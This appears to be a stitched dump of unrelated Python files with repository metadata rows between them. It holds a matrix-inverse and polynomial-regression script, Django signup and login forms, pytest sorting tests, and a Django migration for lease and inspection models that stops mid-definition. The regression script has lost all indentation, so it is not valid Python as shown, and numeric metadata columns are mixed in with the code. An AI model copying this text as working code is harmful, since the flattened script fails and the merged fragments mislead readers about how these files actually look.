def getAdyacente(A,r,c):
Am, An = getDimensions(A)
C = createMatrix(Am-1, An-1, 0)
for i in range(Am):
if (i == r):
continue
for j in range(An):
if (j == c):
continue
ci = 0
cj = 0
if (i < r):
ci = i
else:
ci = i-1
if (j < c):
cj = j
else:
cj = j-1
C[ci][cj] = A[i][j]
return C
def detMatrix(A):
m,n = getDimensions(A)
if m!=n:
print("Matrix is not square")
return []
if (n==1):
return A[0][0]
if (n==2):
return (A[0][0]*A[1][1]) - (A[1][0]*A[0][1])
det = 0
for j in range(m):
det += (-1)**j*A[0][j]*detMatrix(getAdyacente(A,0,j))
return det
def getMatrizTranspuesta(A):
m,n = getDimensions(A)
C = createMatrix(n,m,0)
for i in range(m):
for j in range(n):
C[j][i] = A[i][j]
return C
def getMatrizAdjunta(A):
m,n = getDimensions(A)
if m != n:
print("The matrix is not square")
return []
C = createMatrix(m,n,0)
for i in range(m):
for j in range(n):
C[i][j] = ((-1)**(i+j))*detMatrix(getAdyacente(A,i,j))
return C
def getMatrizInversa(A):
m,n = getDimensions(A)
if m != n:
print("The matrix is not square")
return []
detA = detMatrix(A)
if detA== 0:
print("The matrix has no inverse")
return []
At = getMatrizTranspuesta(A)
adjA = getMatrizAdjunta(At)
invDetA = 1/detA
C = createMatrix(m,n,0)
for i in range(m):
for j in range(n):
C[i][j]=invDetA*adjA[i][j]
return C
def regPolinomial(grado, x, y):
grado += 1
A = createMatrix(grado,grado)
for i in range(grado):
for j in range(grado):
A[i][j] = sum( xi**(i+j) for xi in x)
C = createMatrix(grado,1)
for i in range(grado):
C[i][0] = sum((xi**i)*yi for xi,yi in zip(x,y))
invA = getMatrizInversa(A)
return multMatrix(invA,C)
def evalPolinomio(coef,x):
y = []
coef = np.asarray(coef)
for i in range(len(x)):
y.append(0)
for c in range(len(coef)):
y[i] += (x[i]**c) * coef[c]
return y
x = [1, 2, 3, 4, 5] # max degree = number of points - 1
y = [88, 87, 84, 82, 79]
plt.plot(x,y,'rx')
#plt.show()
coef = regPolinomial(2, x, y) # change here to set the degree of the polynomial to fit
print(coef)
x2 = np.linspace(0,8,100)
y2 = evalPolinomio(coef,x2)
plt.plot(x2,y2)
plt.show()
yesp = evalPolinomio(coef,[7])
print("expected weight at 7 weeks --> ", yesp[0][0])
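Since regPolinomial solves the least-squares normal equations, numpy.polyfit gives an independent cross-check on the same data; polyfit returns coefficients highest-degree first, so they are reversed here to match the ascending order regPolinomial produces. A hedged, self-contained verification sketch:

```python
import numpy as np

x = [1, 2, 3, 4, 5]
y = [88, 87, 84, 82, 79]
# polyfit returns highest degree first; reverse to ascending order.
coef_np = np.polyfit(x, y, 2)[::-1]
# Solving the normal equations by hand for this data gives the exact
# least-squares coefficients [89.4, -71/70, -3/14].
```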
| 24.874286 | 116 | 0.48323 | 1,324 | 8,706 | 3.177492 | 0.0929 | 0.083195 | 0.034229 | 0.062753 | 0.985976 | 0.985976 | 0.985976 | 0.985976 | 0.985976 | 0.969337 | 0 | 0.022979 | 0.325178 | 8,706 | 349 | 117 | 24.945559 | 0.693106 | 0.06754 | 0 | 0.97351 | 0 | 0 | 0.05997 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086093 | false | 0 | 0.013245 | 0.006623 | 0.245033 | 0.059603 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2acecf14a35f21b92f172ffdd413841efaae277d | 4,023 | py | Python | user/forms.py | qq20004604/Mail-Report-System | 59d2390431251d8ffd0435cab510a37900f2dc17 | [
"Apache-2.0"
] | 1 | 2020-07-29T08:54:46.000Z | 2020-07-29T08:54:46.000Z | user/forms.py | qq20004604/Mail-Report-System | 59d2390431251d8ffd0435cab510a37900f2dc17 | [
"Apache-2.0"
] | 6 | 2021-03-19T10:24:43.000Z | 2021-09-22T19:30:43.000Z | user/forms.py | qq20004604/Mail-Report-System | 59d2390431251d8ffd0435cab510a37900f2dc17 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from package.form import Form, forms
# Send registration verification code
class SendRegCodeForm(Form):
username = forms.CharField(label='username',
min_length=2,
max_length=20,
required=True,
error_messages={
'required': 'You did not fill in [username]',
'max_length': '[username] length must be between 2 and 20 characters',
'min_length': '[username] length must be between 2 and 20 characters'
}
)
email = forms.EmailField(label='email',
min_length=6,
max_length=80,
required=True,
error_messages={
'required': 'You did not fill in [email address]',
'max_length': '[email address] length must be between 6 and 80 characters',
'min_length': '[email address] length must be between 6 and 80 characters'
})
# Register
class RegisterForm(Form):
username = forms.CharField(label='username',
min_length=2,
max_length=20,
required=True,
error_messages={
'required': 'You did not fill in [username]',
'max_length': '[username] length must be between 2 and 20 characters',
'min_length': '[username] length must be between 2 and 20 characters'
}
)
password = forms.CharField(label='password',
min_length=8,
max_length=40,
required=True,
error_messages={
'required': 'You did not fill in [password]',
'max_length': '[password] length must be between 8 and 40 characters',
'min_length': '[password] length must be between 8 and 40 characters'
}
)
email = forms.EmailField(label='email',
min_length=6,
max_length=80,
required=True,
error_messages={
'required': 'You did not fill in [email address]',
'max_length': '[email address] length must be between 6 and 80 characters',
'min_length': '[email address] length must be between 6 and 80 characters'
})
regcode = forms.CharField(label='regcode',
min_length=6,
max_length=6,
required=True,
error_messages={
'required': 'You did not fill in [verification code]',
'max_length': '[verification code] format is invalid',
'min_length': '[verification code] format is invalid'
})
# Login
class LoginForm(Form):
username = forms.CharField(label='username',
min_length=2,
max_length=20,
required=True,
error_messages={
'required': 'You did not fill in [username]',
'max_length': '[username] length must be between 2 and 20 characters',
'min_length': '[username] length must be between 2 and 20 characters'
}
)
password = forms.CharField(label='password',
min_length=8,
max_length=40,
required=True,
error_messages={
'required': 'You did not fill in [password]',
'max_length': '[password] length must be between 8 and 40 characters',
'min_length': '[password] length must be between 8 and 40 characters'
}
)
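The forms above all enforce the same kind of length bounds; a hedged, Django-free sketch of that rule (function name and message wording are illustrative, not the project's API):

```python
def length_errors(value, min_len, max_len, label):
    # Mirror the required / min_length / max_length checks without Django.
    if not value:
        return ['You did not fill in [%s]' % label]
    if not (min_len <= len(value) <= max_len):
        return ['[%s] length must be between %d and %d characters'
                % (label, min_len, max_len)]
    return []

ok = length_errors('alice', 2, 20, 'username')
bad = length_errors('x', 2, 20, 'username')
```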
| 43.258065 | 69 | 0.319911 | 247 | 4,023 | 5.048583 | 0.202429 | 0.115477 | 0.109062 | 0.160385 | 0.85004 | 0.834804 | 0.80433 | 0.80433 | 0.80433 | 0.80433 | 0 | 0.040631 | 0.590107 | 4,023 | 92 | 70 | 43.728261 | 0.715585 | 0.014169 | 0 | 0.765432 | 0 | 0 | 0.155769 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.024691 | 0.012346 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
2ad6d40554630a679cf6594b7a4eac65c422f9fd | 2,372 | py | Python | tests/rest_framework_filterdsl_tests/test_sort.py | Awingu/rest_framework_filterdsl | b14c0e95063843f8c08d773531081625a78cb64c | [
"Apache-2.0"
] | 26 | 2017-10-26T18:39:58.000Z | 2021-06-02T07:45:44.000Z | tests/rest_framework_filterdsl_tests/test_sort.py | Awingu/rest_framework_filterdsl | b14c0e95063843f8c08d773531081625a78cb64c | [
"Apache-2.0"
] | 1 | 2019-03-11T12:51:51.000Z | 2019-03-15T15:18:07.000Z | tests/rest_framework_filterdsl_tests/test_sort.py | Awingu/rest_framework_filterdsl | b14c0e95063843f8c08d773531081625a78cb64c | [
"Apache-2.0"
] | 3 | 2017-10-11T08:58:07.000Z | 2020-03-17T13:44:20.000Z | # encoding: utf8
from .testfixtures import animal_get, animal_data
import pytest
@pytest.mark.django_db
def test_sort_by_name_no_direction(animal_get, animal_data):
animal_data()
response = animal_get({
'sort': "name"
})
assert response.status_code == 200
assert len(response.data) == 3
assert response.data[0]['name'] == 'dog'
assert response.data[1]['name'] == 'duck'
assert response.data[2]['name'] == 'tortoise'
@pytest.mark.django_db
def test_sort_by_name_direction_plus(animal_get, animal_data):
animal_data()
response = animal_get({
'sort': "+name"
})
assert response.status_code == 200
assert len(response.data) == 3
assert response.data[0]['name'] == 'dog'
assert response.data[1]['name'] == 'duck'
assert response.data[2]['name'] == 'tortoise'
@pytest.mark.django_db
def test_sort_by_name_direction_minus(animal_get, animal_data):
animal_data()
response = animal_get({
'sort': "-name"
})
assert response.status_code == 200
assert len(response.data) == 3
assert response.data[0]['name'] == 'tortoise'
assert response.data[1]['name'] == 'duck'
assert response.data[2]['name'] == 'dog'
@pytest.mark.django_db
def test_sort_by_multicolumn(animal_get, animal_data):
animal_data()
response = animal_get({
'sort': "-legs, name"
})
assert response.status_code == 200
assert len(response.data) == 3
assert response.data[0]['name'] == 'dog'
assert response.data[1]['name'] == 'tortoise'
assert response.data[2]['name'] == 'duck'
@pytest.mark.django_db
def test_sort_by_pk_direction_minus(animal_get, animal_data):
animal_data()
response = animal_get({
'sort': "-id"
})
assert response.status_code == 200
assert len(response.data) == 3
assert response.data[0]['name'] == 'duck'
assert response.data[1]['name'] == 'tortoise'
assert response.data[2]['name'] == 'dog'
@pytest.mark.django_db
def test_sort_and_filter(animal_get, animal_data):
animal_data()
response = animal_get({
'filter': "name startswith 'd'",
'sort': "-id"
})
assert response.status_code == 200
assert len(response.data) == 2
assert response.data[0]['name'] == 'duck'
assert response.data[1]['name'] == 'dog'
| 30.410256 | 63 | 0.637015 | 306 | 2,372 | 4.728758 | 0.137255 | 0.222529 | 0.211472 | 0.091914 | 0.906704 | 0.901175 | 0.901175 | 0.901175 | 0.878369 | 0.822391 | 0 | 0.022364 | 0.208263 | 2,372 | 77 | 64 | 30.805195 | 0.748136 | 0.005902 | 0 | 0.75 | 0 | 0 | 0.097623 | 0 | 0 | 0 | 0 | 0 | 0.426471 | 1 | 0.088235 | false | 0 | 0.029412 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
2adaaeec14fc35bd612dea156ad181f182e370ba | 39,147 | py | Python | operations/propfac/migrations/0001_initial.py | kaizer88/emps | 2669b32c46befcf1a19390fb25013817e6b00980 | [
"MIT"
] | null | null | null | operations/propfac/migrations/0001_initial.py | kaizer88/emps | 2669b32c46befcf1a19390fb25013817e6b00980 | [
"MIT"
] | null | null | null | operations/propfac/migrations/0001_initial.py | kaizer88/emps | 2669b32c46befcf1a19390fb25013817e6b00980 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('employees', '0001_initial'),
('offices', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HistoricalLeaseAgreement',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('office_space', models.CharField(default=None, max_length=200, null=True, blank=True)),
('rental_amount', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('surety', models.BooleanField(default=False)),
('deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('surety_deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('electricity_deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('electricity', models.CharField(default=None, max_length=200, null=True, blank=True, choices=[(b'Eskom', b'Eskom'), (b'Pre-Paid', b'Pre-Paid'), (b'PEC', b'PEC Metering'), (b'Municipal', b'Municipal')])),
('current_leasee', models.CharField(default=None, max_length=200, null=True, blank=True)),
('leasor', models.CharField(default=b'Pending', max_length=200, null=True, blank=True)),
('lease_expiry_date', models.DateField(null=True, blank=True)),
('notice_term', models.CharField(default=None, max_length=200, null=True, blank=True)),
('contact_person', models.CharField(default=None, max_length=200, null=True, blank=True)),
('status', models.CharField(default=b'Operational', max_length=20, null=True, blank=True, choices=[(b'Operational', b'Operational'), (b'Pending Closure', b'Pending Closure'), (b'Closed', b'Closed')])),
('exit_clause_sent', models.BooleanField(default=False)),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical lease agreement',
},
),
migrations.CreateModel(
name='HistoricalLeaseAgreementRenewal',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('expiry_date', models.DateField(null=True, blank=True)),
('renewal_date', models.DateField(null=True, blank=True)),
('rental_amount', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('new_expiry_date', models.DateField(null=True, blank=True)),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical lease agreement renewal',
},
),
migrations.CreateModel(
name='HistoricalOfficeInspection',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('date_checked', models.DateField(null=True, blank=True)),
('time_checked', models.TimeField(null=True, blank=True)),
('walls_and_covering', models.BooleanField(default=False)),
('windows_and_handles', models.BooleanField(default=False)),
('blinds', models.BooleanField(default=False)),
('ceiling', models.BooleanField(default=False)),
('lights_and_switches', models.BooleanField(default=False)),
('doors_and_handles', models.BooleanField(default=False)),
('air_conditioner', models.BooleanField(default=False)),
('furniture', models.BooleanField(default=False)),
('fire_extinguisher', models.BooleanField(default=False)),
('white_board', models.BooleanField(default=False)),
('overhead_projector', models.BooleanField(default=False)),
('appliances', models.BooleanField(default=False)),
('shelving', models.BooleanField(default=False)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('floor', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Floor', null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('inspector', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='employees.Employee', null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('section', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Section', null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical office inspection',
},
),
migrations.CreateModel(
name='HistoricalPFComment',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('comments', models.CharField(default=None, max_length=2000)),
('commented', models.DateTimeField(editable=False, blank=True)),
('comment_type', models.CharField(default=None, max_length=120, null=True, blank=True)),
('obj_id', models.IntegerField(null=True, blank=True)),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical pf comment',
},
),
migrations.CreateModel(
name='HistoricalPFDocument',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('file_name', models.CharField(max_length=255, blank=True)),
('file', models.TextField(max_length=100)),
('obj_id', models.CharField(default=None, max_length=20, null=True, blank=True)),
('obj_type', models.CharField(default=None, max_length=50, null=True, blank=True)),
('date_uploaded', models.DateTimeField(editable=False, blank=True)),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical pf document',
},
),
migrations.CreateModel(
name='HistoricalPFRequisition',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('quote_number', models.CharField(default=None, max_length=120)),
('obj_id', models.IntegerField(null=True, blank=True)),
('requisition_type', models.CharField(default=None, max_length=120)),
('description', models.CharField(default=None, max_length=2000, null=True, blank=True)),
('requested', models.DateTimeField(editable=False, blank=True)),
('supplier', models.CharField(default=None, max_length=120)),
('vat_included', models.BooleanField(default=True)),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('requested_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='employees.Employee', null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical pf requisition',
},
),
migrations.CreateModel(
name='HistoricalPFRequisitionItem',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('item_code', models.CharField(default=None, max_length=200, null=True, blank=True)),
('line_item', models.CharField(default=None, max_length=200, null=True, blank=True)),
('qty', models.IntegerField(null=True, blank=True)),
('unit_price', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('line_total', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical pf requisition item',
},
),
migrations.CreateModel(
name='HistoricalPropertyMaintenance',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('maint_date', models.DateField(null=True, blank=True)),
('maintenance_type', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'General', b'General'), (b'Air Conditioning', b'Air Conditioning'), (b'Electrical', b'Electrical'), (b'Floor Capets and Tiling', b'Floor Carpets and Tiling'), (b'Plumbing', b'Plumbing'), (b'Security', b'Security'), (b'Walls And Partitioning', b'Walls And Partitioning')])),
('description', models.CharField(default=None, max_length=2000, null=True, blank=True)),
('projected_cost', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('actual_cost', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('difference', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('invoice_number', models.CharField(default=None, max_length=200, null=True, blank=True)),
('service_provider', models.CharField(default=None, max_length=200, null=True, blank=True)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages'), (b'Write Off', b'Write Off')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical property maintenance',
},
),
migrations.CreateModel(
name='HistoricalToiletInspection',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('toilet', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'gents', b'Gents'), (b'ladies', b'Ladies')])),
('date_checked', models.DateField(null=True, blank=True)),
('time_checked', models.TimeField(null=True, blank=True)),
('walls_and_covering', models.BooleanField(default=False)),
('windows_and_handles', models.BooleanField(default=False)),
('ceiling', models.BooleanField(default=False)),
('lights_and_switches', models.BooleanField(default=False)),
('doors_and_hanles', models.BooleanField(default=False)),
('air_extractor', models.BooleanField(default=False)),
('seat_and_cover', models.BooleanField(default=False)),
('urinary', models.BooleanField(default=False)),
('water_dispenser', models.BooleanField(default=False)),
('washing_basin', models.BooleanField(default=False)),
('taps', models.BooleanField(default=False)),
('towel_dispencer', models.BooleanField(default=False)),
('detegent_dispencer', models.BooleanField(default=False)),
('mirror', models.BooleanField(default=False)),
('furniture', models.BooleanField(default=False)),
('fire_extinguisher', models.BooleanField(default=False)),
('shelving', models.BooleanField(default=False)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('floor', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Floor', null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('inspector', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='employees.Employee', null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical toilet inspection',
},
),
migrations.CreateModel(
name='LeaseAgreement',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('office_space', models.CharField(default=None, max_length=200, null=True, blank=True)),
('rental_amount', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('surety', models.BooleanField(default=False)),
('deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('surety_deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('electricity_deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('electricity', models.CharField(default=None, max_length=200, null=True, blank=True, choices=[(b'Eskom', b'Eskom'), (b'Pre-Paid', b'Pre-Paid'), (b'PEC', b'PEC Metering'), (b'Municipal', b'Municipal')])),
('current_leasee', models.CharField(default=None, max_length=200, null=True, blank=True)),
('leasor', models.CharField(default=b'Pending', max_length=200, null=True, blank=True)),
('lease_expiry_date', models.DateField(null=True, blank=True)),
('notice_term', models.CharField(default=None, max_length=200, null=True, blank=True)),
('contact_person', models.CharField(default=None, max_length=200, null=True, blank=True)),
('status', models.CharField(default=b'Operational', max_length=20, null=True, blank=True, choices=[(b'Operational', b'Operational'), (b'Pending Closure', b'Pending Closure'), (b'Closed', b'Closed')])),
('exit_clause_sent', models.BooleanField(default=False)),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('branch', models.ForeignKey(related_name='branch_leaseagreements', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_leaseagreements', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='user_modified_leaseagreements', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='LeaseAgreementRenewal',
fields=[
